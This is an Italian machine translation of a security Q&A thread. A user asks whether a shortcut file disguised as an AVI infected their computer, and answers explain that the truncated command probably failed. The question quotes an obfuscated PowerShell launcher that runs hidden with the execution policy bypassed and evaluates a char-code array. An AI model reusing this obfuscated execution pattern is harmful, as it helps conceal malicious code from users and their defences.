Ho appena infettato la mia macchina?

Naviga le tue risposte
3

Ho appena eseguito un file AVI che è stato inviato a me, pensando che gli AVI fossero al sicuro. si scopre che era una scorciatoia di Windows con questo nel percorso: 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd
1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',
[CHar[]](36 ,97,115, 112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,
79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116, 101

Spero che la mancanza di parenti di chiusura significhi che questo è inocuo. Mi sono fottuto?

    
posta Brad Irby 05.12.2018 - 21:32
fonte

2 risposte

0

I file di scelta rapida (tecnicamente i file .lnk) sono principalmente di testo e possono essere letti utilizzando qualsiasi programma che tenta di aprire il file piuttosto che richiamare ShellExecute su di esso. Il testo conterrà il comando incorporato. La mancanza di parentesi di chiusura, l'incompletezza del cmdlet New-Object e così via probabilmente significa che stai bene finché la scorciatoia è in realtà troncata; se non lo è, probabilmente dovresti pensare che la macchina sia compromessa.

Per curiosità, quale programma di merda ha trasferito un file .LNK mentre nascondevi l'estensione? Quasi tutti i programmi che nascondono il .LNK sono consapevoli che le scorciatoie possono essere dannose e ti avvisano, rinominano o addirittura bloccano. Ha improvvisamente preso veramente il ventesimo secolo qui? In ogni caso, dovresti assolutamente segnalarlo come un bug di sicurezza nel programma (supponendo, ovviamente, che entrambi abbiano nascosto il .LNK e non ti abbiano avvisato).

    
risposta data 05.12.2018 - 22:14
fonte
0

Questo frammento si converte in 

$aspx = ((New-Object Syste

... nel qual caso sembrerebbe non avere successo se quello è davvero la fine di esso.

la tua domanda era "ho infettato la mia macchina"?

Vado con "no" poiché sembra improbabile che abbia avuto successo per le circostanze fornite (che è abbastanza comune, molti exploit sono infranti / non funzionano per circostanze particolari).

    
risposta data 05.01.2019 - 01:56
fonte

Leggi altre domande sui tag

Perché usare .ENV? Cosa c'è di sbagliato con la memorizzazione dei segreti in un file config.php al di fuori della directory principale? Perché Spotify utilizza la mia webcam (AppleCamera)